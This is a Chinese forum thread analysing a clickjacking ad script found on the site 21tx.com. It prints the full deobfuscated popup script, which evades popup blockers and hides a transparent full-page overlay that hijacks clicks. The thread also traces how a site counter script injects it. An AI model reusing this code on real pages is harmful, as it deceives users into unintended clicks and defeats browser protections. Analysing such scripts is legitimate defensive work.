国内也有牛人啊。很有用的。
天星网ClickJacking点击劫持分析http://www.21tx.com/ 天星网
我得联系联系作者
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
http://www.lxting.com/script/popup/v1_min.js
这个是锁定到底JS脚本,
解密后的代码(function() {
var aa_url = window.ytpp_url;
var ua = navigator.userAgent;
var form_div = document.createElement('div');
var form_pd = 0;
var browser = {
ie: /msie/i.test(ua),
ie6: /msie 6/i.test(ua),
ie7: /msie 7/i.test(ua),
ie8: /msie 8/i.test(ua),
ie9: /msie 9/i.test(ua),
360 : /360se/i.test(ua),
sogou: /;?se.+?MetaSr/i.test(ua),
maxthon: /Maxthon/i.test(ua),
tt: /TencentTraveler/i.test(ua),
ff: /firefox/i.test(ua),
webkit: /AppleWebKit/i.test(ua),
opera: /Opera/i.test(ua),
qqbrowser: /QQBrowser/i.test(ua),
cr: /chrome/i.test(ua),
gg: window.chrome,
theworld: /Theworld/i.test(ua)
};
var _setting = "";
var _ct = 0;
var _le = 0;
var _pd = 1;
var _pd2 = 0;
var _pc = 1;
var _pc2 = 1;
var _pco = 0;
var _pta = 0;
var _ptb = 0;
var _pt2a = 0;
var _pt2b = 0;
var _pt3a = 0;
var _pt3b = 0;
var _pt4a = 0;
var _pt4b = 0;
var _pt5a = 0;
var _pt5b = 0;
var _pt6a = 0;
var _pt6b = 0;
var _pt7a = 0;
var _pt7b = 0;
var _pt8a = 0;
var _pt8b = 0;
var _pt9a = 0;
var _pt9b = 0;
var _pt10a = 0;
var _pt10b = 0;
var _po = 0;
var _poo = 0;
var ckn, ckt;
var ads = 0;
function b(w) {
var s = w + "=";
var r = "";
var o = 0;
var d = 0;
var p = document.cookie;
if (document.cookie.length > 0) {
o = document.cookie.indexOf(s);
if (o != -1) {
o += s.length;
d = document.cookie.indexOf(";", o);
if (d == -1) d = document.cookie.length;
r = unescape(document.cookie.substring(o, d))
}
}
return r
};
function p(w, p, v) {
var t = 30;
try {
t = parseFloat(p) * 1
} catch(e) {
t = 30
}
if (isNaN(t)) t = 30;
var then = new Date();
then.setTime(then.getTime() + t * 60 * 1000);
document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
};
function init() {
_setting = ytpp_sti;
if (getp(_setting, "CT")) {
_ct = getp(_setting, "CT")
}
if (getp(_setting, "LE")) {
_le = getp(_setting, "LE")
}
if (getp(_setting, "PD2")) {
_pd2 = getp(_setting, "PD2")
}
if (getp(_setting, "PC2")) {
_pc2 = getp(_setting, "PC2")
}
if (getp(_setting, "PCO")) {
_pco = getp(_setting, "PCO")
}
for (var i = 1; i <= 10; i++) {
var n = i == 1 ? "": i;
if (getp(_setting, "PT" + n)) {
eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
eval("_pt" + n + "a = _pt" + n + ";");
eval("_pt" + n + "b = _pt" + n + ";")
}
}
if (getp(_setting, "PO")) {
_po = getp(_setting, "PO")
}
if (getp(_setting, "POO")) {
_poo = getp(_setting, "POO")
}
if (_pco == 1 || _poo == 1) {
if (_poo == 1) {
_pco = 0
} else {
_poo = 0
}
_pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
for (var i = 2; i <= 10; i++) {
eval("_pt" + i + "a = _pt" + i + "b = 0;")
}
}
};
function getp(s, p) {
var i = s.indexOf(p + ":");
if (i >= 0) {
return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
}
};
function event(e, event, func, act) {
if (browser.ie) e('on' + event, func);
else e(event, func, false)
}
function pop(url, param) {
if (!document.body) {
return setTimeout(function() {
pop(url, param)
},
13)
}
try {
if (browser['cr'] && browser['gg']) {
try {
hrefopen(url)
} catch(e) {
a_pop(url)
}
} else if (browser['webkit'] && browser['maxthon']) {
if (!func(url)) {
try {
form_pop(url);
a_pop(url)
} catch(e) {}
}
} else if (browser['tt']) {
try {
object_pop(url)
} catch(e) {
a_pop(url)
}
} else if (browser['sogou']) {
if (!func(url)) {
try {
a_pop(url)
} catch(e) {}
}
} else if (browser['webkit'] && browser['qqbrowser']) {
if (!func(url)) {
try {
form_pop(url)
} catch(e) {
click_pop(url)
}
}
} else if (browser['webkit'] || browser['opera']) {
try {
form_pop(url);
a_pop(url)
} catch(e) {}
} else if (browser['theworld'] && browser.ie6) {
if (!object_pop2(url)) {
a_pop(url)
}
} else if (browser['theworld'] && browser.ie8) {
if (!func(url)) {
try {
object_pop(url)
} catch(e) {
click_pop(url)
}
}
} else if (browser.ie6) {
if (!func(url)) {
object_pop2(url)
}
} else if (browser.ie8) {
if (!func(url)) {
try {
object_pop(url)
} catch(e) {
document.onclick = function() {
func(url);
document.onclick = null
}
}
}
} else if (browser['ie']) {
try {
object_pop(url)
} catch(e) {
click_pop(url)
}
} else if (browser['ff']) {
if (!func(url)) {
click_pop(url)
}
} else {
if (!func(url)) {
click_pop(url)
}
}
} catch(e) {
if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
click_pop(url)
} else {
a_pop(url)
}
}
}
function object_pop(url, param) {
var object = document.createElement('object');
object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
append(object);
object.launchURL(url);
ads++;
p(ckn, ckt, ads)
}
function object_pop2(url, param) {
var object2 = document.createElement('object');
object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
append(object2);
for (var i in object2) {
try { (function(o) {})(object2)
} catch(e) {}
}
setTimeout(function() {
object2.DOM.Script.open(url, '_blank', '')
},
500);
ads++;
p(ckn, ckt, ads)
}
function append(e) {
for (var t in {
body: 1
}) {
var ele = document.getElementsByTagName(t);
for (var i = 0; i < ele.length; i++) {
ele.insertBefore(e, ele.firstChild);
return
}
}
}
function hrefopen(url) {
try {
var c = document.createElement("a");
c.setAttribute("href", url);
c.setAttribute("target", "_blank");
c.setAttribute("style", "display:none;");
var b = document.createEvent("MouseEvents");
b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
c.dispatchEvent(b);
ads++;
p(ckn, ckt, ads);
return true
} catch(q) {
return false
}
}
function form_pop(url) {
form_div.setAttribute('id', '__unionsky_push_d_object_box__');
form_div.setAttribute('style', 'display:none');
var form = document.createElement('form');
form.setAttribute('action', aa_url);
form.setAttribute('method', 'post');
form.setAttribute('name', '__unionsky_push_d_form_box__');
form.setAttribute('target', '_blank');
form.setAttribute('style', 'display:none');
var sinput = document.createElement('input');
sinput.setAttribute('style', 'display:none');
sinput.setAttribute('type', 'submit');
sinput.setAttribute('id', '_sumit_2app');
form.appendChild(sinput);
form_div.appendChild(form);
append(form_div);
var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
try {
document.getElementById("_sumit_2app").click()
} catch(e) {
event(document, 'keyup',
function(e) {
if (document.getElementById('__unionsky_push_d_object_box__') == null) {
return
};
e = e || window.event;
e.canceBubble = true;
event(document, 'keyup', arguments.callee, true);
form_pd = 1;
unionsky_from.submit()
})
}
};
function click_pop(url, param) {
event(document, 'mouseup',
function(e) {
e = e || window.event;
e.canceBubble = true;
event(document, 'mouseup', arguments.callee, true);
func(url, param);
ads++;
p(ckn, ckt, ads)
})
};
function a_pop(url) {
if (ytpp_plid == 166028) {
return
}
if (!document.body) {
return setTimeout(function() {
a_pop(url)
},
13)
}
var a = document.createElement("a");
a.href = url;
a.target = "_blank";
var div = document.createElement('div');
div.style.backgroundColor = '#fff';
a.appendChild(div);
append(a);
var as = a.style;
as.position = "absolute";
as.zIndex = '2147483647';
as.display = "block";
as.top = "0px";
as.left = "0px";
as.cursor = 'default';
as.opacity = "0";
as.filter = "alpha(opacity:0)";
var m = setInterval(function() {
if (form_pd == 1) {
a.parentNode.removeChild(a);
clearInterval(m);
return
}
a.style.zIndex = '2147483647';
var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
div.style.height = d.clientHeight + 'px';
if (browser['ie']) {
try {
var divs = document.body.childNodes;
for (var i = 0; i < divs.length; i++) {
if (!divs['style']) {
continue
}
var _i = parseInt(divs.style.zIndex);
if (_i && divs != a && _i == 2147483647) {
divs.style.zIndex = _i - 1
}
}
a.style.zIndex = '2147483647'
} catch(e) {}
}
},
120);
a.onclick = function(e) {
if (document.getElementById('__unionsky_push_d_object_box__') != null) {
form_div.parentNode.removeChild(form_div)
}
e = e || window.event;
e.cancelBubble = true;
setTimeout(function() {
a.parentNode.removeChild(a)
},
200);
clearInterval(m);
ads++;
p(ckn, ckt, ads)
};
event(a, 'mouseup',
function(e) {
e = e || window.event;
e.cancelBubble = true
})
}
function func(url, param) {
var f = window;
var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
if (w) {
ads++;
p(ckn, ckt, ads)
};
return w
}
function fstart(url) {
init();
if (_ct >= 0) {
ckn = "YITIAN_NUM";
ckt = _ct
} else {
ckn = "YITIAN_ALL";
ckt = Math.abs(_ct)
}
if (ckt > 0) {
if (b(ckn)) {
try {
ads = parseFloat(b(ckn))
} catch(q) {}
}
}
if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
return
} else {
if (_le > 0) {
setTimeout(go(url), _le * 1000)
} else {
go(url)
}
}
}
function go(url) {
if (_poo == 1) {
try {
func(url)
} catch(q) {}
} else if (_pco == 1) {
a_pop(url)
} else {
if (_pd == 1) {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
}
if (_pd2 > Math.random()) {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
}
for (var i = 1; i <= 10; i++) {
var n = i == 1 ? "": i;
if (eval("_pt" + n + "b") > Math.random()) {
setTimeout(function() {
setTimeout(function() {
pop(url, {
a: 1,
b: 2
})
},
300)
},
parseInt(eval("_pt" + n + "a")) * 1000)
}
}
if (_pc2 > Math.random()) {
a_pop(url)
}
if (_po > Math.random()) {
try {
func(url)
} catch(q) {}
}
}
};
fstart(aa_url);
event(window, 'beforeunload',
function() {})
})();通过浏览器抓包
URL从这里产生
http://play.unionsky.cn/show/?placeid=141830
直接打开看不到什么东西
http://www.unionsky.cn/ 是属于这个广告联盟的
我们直接分析抓包的内容
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r;
var ytpp_u = encodeURIComponent(navigator.userAgent);
var ytpp_s = window.screen.width + "*" + window.screen.height;
var ytpp_l = navigator.browserLanguage || navigator.language;
var ytpp_plid = 141830;
var ytpp_w = 0;
var ytpp_h = 0;
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random();
var ytpp_ads = 14;
var ytpp_sti = 'CT:-3;PD:1;PC:1;PC2:1;PT:60,1;PT2:100,1;';
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。
继续分析 发现这里
http://txsite.21tx.com/count/count.js
txcount_uid = 1;
txcount_uh = 0;
txcount_uw = 0;
txcount_uah = 0;
txcount_uaw = 0;
txcount_ucd = 0;
if (window.screen) {
txcount_uh = window.screen.height;
txcount_uw = window.screen.width;
txcount_uah = window.screen.availHeight;
txcount_uaw = window.screen.availWidth;
txcount_ucd = window.screen.colorDepth;
}
var url = "http://txsite.21tx.com/count/count.aspx";
url = url + "?u="+ txcount_uid;
//url = url + "&f=" + txcount_f;
url = url + "&k=" + txsite_pagekey;
//url = url + "&t=" + txcount_t;
url = url + "&l=" + escape(document.location);
url = url + "&r=" + escape(document.referrer);
url = url + "&uh=" + txcount_uh;
url = url + "&uw=" + txcount_uw;
url = url + "&uah=" + txcount_uah;
url = url + "&uaw=" + txcount_uaw;
url = url + "&ucd=" + txcount_ucd;
document.write("<script src=" + url + "><\/script>");
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>');
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>');
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
一切昭然天下了。
代码产生的直接效果如下
<atarget="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>
很隐秘的一段好代码
标记一下 好象看不懂还:dizzy: 不清楚国内,莫非做taobao不可以直接用弹窗吗? 没用 360 搜狗 直接就拦截了,chrome可以弹出来 adblock 完美屏蔽:lol 没研究全,期待跟多解析。 代码看不懂,不过觉得挺好用的……自动弹窗 没懂
1,首次访问有个弹窗,但是被chrome给拦截了
2,劫持了第一次点击
3,CS了一下unionsky
然后? cissss 发表于 2013-12-18 01:24 static/image/common/back.gif
没懂
1,首次访问有个弹窗,但是被chrome给拦截了
懂的人一看就懂 不懂的人怎么看就不懂 这个CJ怎么搞的这么复杂... 小狠 发表于 2013-12-18 03:49 static/image/common/back.gif
懂的人一看就懂 不懂的人怎么看就不懂
我确实不懂你发这贴的意思。 可以理解为装逼么? 不就是个弹窗代码吗?:o:o :(:(我表示看不懂 占位,慢慢领会啥意思:lol
页:
[1]
2
